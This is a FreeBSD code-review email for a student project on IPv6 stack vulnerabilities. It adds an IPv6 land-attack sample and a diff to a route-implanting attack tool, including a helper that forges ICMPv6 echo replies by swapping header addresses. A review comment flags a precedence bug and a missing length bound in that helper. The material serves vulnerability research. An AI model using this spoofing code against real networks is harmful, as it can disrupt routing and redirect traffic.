Date: Sat, 1 Jul 2006 14:21:12 GMT From: Clément Lecigne <clem1@FreeBSD.org> To: Perforce Change Reviews <perforce@FreeBSD.org> Subject: PERFORCE change 100396 for review Message-ID: <200607011421.k61ELCDD087685@repoman.freebsd.org>
http://perforce.freebsd.org/chv.cgi?CH=100396 Change 100396 by clem1@clem1_ipv6vulns on 2006/07/01 14:20:17 land6.c - implementation of the IPv4 land attack. KAME is not vulnerable. Some improvements around redir6.c. Affected files ... .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/land6.c#1 add .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 edit Differences ... ==== //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 (text+ko) ==== @@ -3,6 +3,7 @@ * Implementation of the route implanting attack by Vanhauser * using icmp6 echo request and redirect message. * + * Copyright (c) 2006 Clément Lecigne <clem1@FreeBSD.org> * Copyright (c) 1998 - 2001 Mike D. Schiffman <mike@infonexus.com> * All rights reserved. * @@ -38,6 +39,7 @@ void redir6(char *, int , struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, char *, char *); void usage(char *); +void inverse(char *); int main(int ac, char **av) @@ -160,7 +162,8 @@ } pkt = libnet_dump_packet(l); - + inverse(pkt + LIBNET_ETH_H); + libnet_destroy(l); usleep(TIMEWAIT); @@ -236,7 +239,40 @@ libnet_destroy(l); } - + +/* + * inverse src and dsp ip in ipv6 header. + * replace echo request type by echo reply type. + * renew the hop limit. + */ +void inverse(char *pkt){ + char tmp[16]; + + /* + * make sure that pkt starts with an ipv6 header. + */ + if (pkt[0] & 0xf != 6) + { + fprintf(stdout, "%s(): packet does not start with an ipv6 header\n", __func__); + exit(EXIT_FAILURE); + } + + /* restore source */ + memcpy(tmp, pkt + 8, 16); + /* erase ip6 source with ip6 dest */ + memcpy(pkt + 8, pkt + 24, 16); + /* erase ip6 dst with saved ip6 source */ + memcpy(pkt + 24, tmp, 16); + /* renew hl */ + pkt[7] = 255; + /* icmp type */ + pkt[40] = ICMP6_ECHOREPLY; + + /* + * XXX: checksum recalculation. + */ + return; +} void usage(char *prog){ fprintf(stdout, "usage: %s -a attack-ip -v victim-ip -r router-ip -d dest-ip"
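Review bot: The sanity check in the added inverse(), `if (pkt[0] & 0xf != 6)`, does not test the IP version field: `!=` binds tighter than `&`, so the expression is `pkt[0] & 1`, and the version is the high nibble of the first header byte in any case. It should read `if (((unsigned char)pkt[0] >> 4) != 6)`. inverse() also takes no length, so the fixed offsets up to `pkt[40]` are read and written without knowing that at least 41 bytes follow the pointer passed from the call site in the -160,7 hunk; a length parameter checked before the memcpy calls would bound them. The diagnostic would be better sent to stderr than stdout. usage(), shown as trailing context, continues outside the hunk.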